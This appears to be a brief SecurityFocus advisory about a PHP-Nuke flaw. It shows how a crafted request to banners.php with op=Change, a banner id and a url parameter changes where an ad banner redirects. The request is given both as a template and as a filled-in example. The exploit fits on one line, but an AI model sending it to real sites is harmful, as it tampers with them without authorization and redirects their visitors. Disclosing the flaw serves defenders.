PHP Nuke Remote Ad Banner URL Change Vulnerability

(submitted by Juan Diego <diego@linuxcolombia.com.co>)

To change the url of the first banner you should enter in your browser

http://target/banners.php?op=Change&bid=bannerid&url=http://where.to

if we want to change the banner number 1 to redir to

www.you_are_redir

we write

http://www.example.com/banners.php?op=Change&bid=1&url=http://you.are.redir

(where www.example.com is the server running php-nuke)


 

Privacy Statement
Copyright 2010, SecurityFocus